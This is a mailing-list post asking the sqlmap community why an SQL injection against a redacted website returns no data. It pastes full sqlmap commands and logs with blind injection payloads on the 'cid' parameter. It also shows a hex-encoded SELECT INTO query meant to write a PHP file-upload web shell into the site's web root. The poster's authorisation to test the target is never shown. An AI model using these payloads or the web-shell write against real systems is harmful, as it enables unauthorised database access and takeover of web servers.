[sqlmap-users] executing query with NONE result
Brought to you by:
inquisb
From: Alok K. <myp...@gm...> - 2014-01-22 05:28:07
|
Hello members, need your help to solve this mystery, my manual assessment against a web application revealed possibility of sqlinjection vulnerability which has been reconfirmed using Netsparker automated web application assessment tool. I then used sqlmap to exploit the sqlinjection flaw to do something interesting but none of them worked for me, even sqlmap says the parameter is injectable and infact it actually exploited the issue but unfortunately with ZERO results. I tried almost everything from "--current-db, --dbs, --banner", and everything found to be executed with result value as NONE. I even tried --sql-shell which gave me an sql-shell> prompt, but whatever query I tried it gave ZERO result without any error, I did tried some custom query but that didn't worked because of Stacked query limitation. I'm positively sure that target parameter is injectable but couldn't make out why it is not executing and/or giving any response to my query Please help me in this, Thanks in advance! I have also posted two of the query which I executed for your reference. SQLMap query output ************************************************************** First query ************************************************************** root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.xxxxxx.com/xxx10.php?cid=1111111 --current-db --no-cast --time-sec=10 -t xxix-output sqlmap/1.0-dev-7ba9e75 - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 18:54:00 [18:54:00] [INFO] setting file for logging HTTP traffic [18:54:00] [INFO] resuming back-end DBMS 'mysql' [18:54:00] [INFO] testing connection to the target URL [18:54:00] [INFO] heuristics detected web page charset 'ISO-8859-2' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: cid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cid=1111111 AND 1062=1062 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cid=1111111 AND SLEEP(10) --- [18:54:00] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL 5.0.11 [18:54:00] [INFO] fetching current database [18:54:00] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [18:54:00] [INFO] retrieved: [18:54:01] [INFO] heuristics detected web page charset 'ascii' [18:54:01] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait.. [18:54:07] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads [18:54:08] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' current database: None [18:54:08] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.xxxxxx.com' [*] shutting down at 18:54:08 ************************************************************** Second query ************************************************************** root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.xxxxxx.com/xxx10.php?cid=1111111 --time-sec=10 --sql-shell sqlmap/1.0-dev-7ba9e75 - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 18:18:17 [18:18:17] [INFO] resuming back-end DBMS 'mysql' [18:18:17] [INFO] testing connection to the target URL [18:18:18] [INFO] heuristics detected web page charset 'ISO-8859-2' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: cid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cid=1111111 AND 1062=1062 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cid=1111111 AND SLEEP(10) --- [18:18:18] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL 5.0.11 [18:18:18] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER sql-shell> user() [18:18:25] [INFO] fetching SQL query output: 'user()' [18:18:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [18:18:25] [INFO] retrieved: [18:18:25] [INFO] heuristics detected web page charset 'ascii' [18:18:26] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait.. [18:18:32] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads [18:18:33] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' sql-shell> user() --hex [18:18:59] [INFO] fetching SQL query output: 'user() --hex' [18:18:59] [INFO] retrieved: [18:19:00] [INFO] retrieved: sql-shell> select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e into "/var/www/xxxxxx.com/upload.php"; --hex [18:19:16] [WARNING] execution of custom SQL queries is only available when stacked queries are supported sql-shell> db_name --hex [18:19:29] [INFO] fetching SQL query output: 'db_name --hex' [18:19:29] [INFO] retrieved: [18:19:29] [INFO] retrieved: sql-shell> x [18:19:39] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.xxxxxx.com' [*] shutting down at 18:19:39 |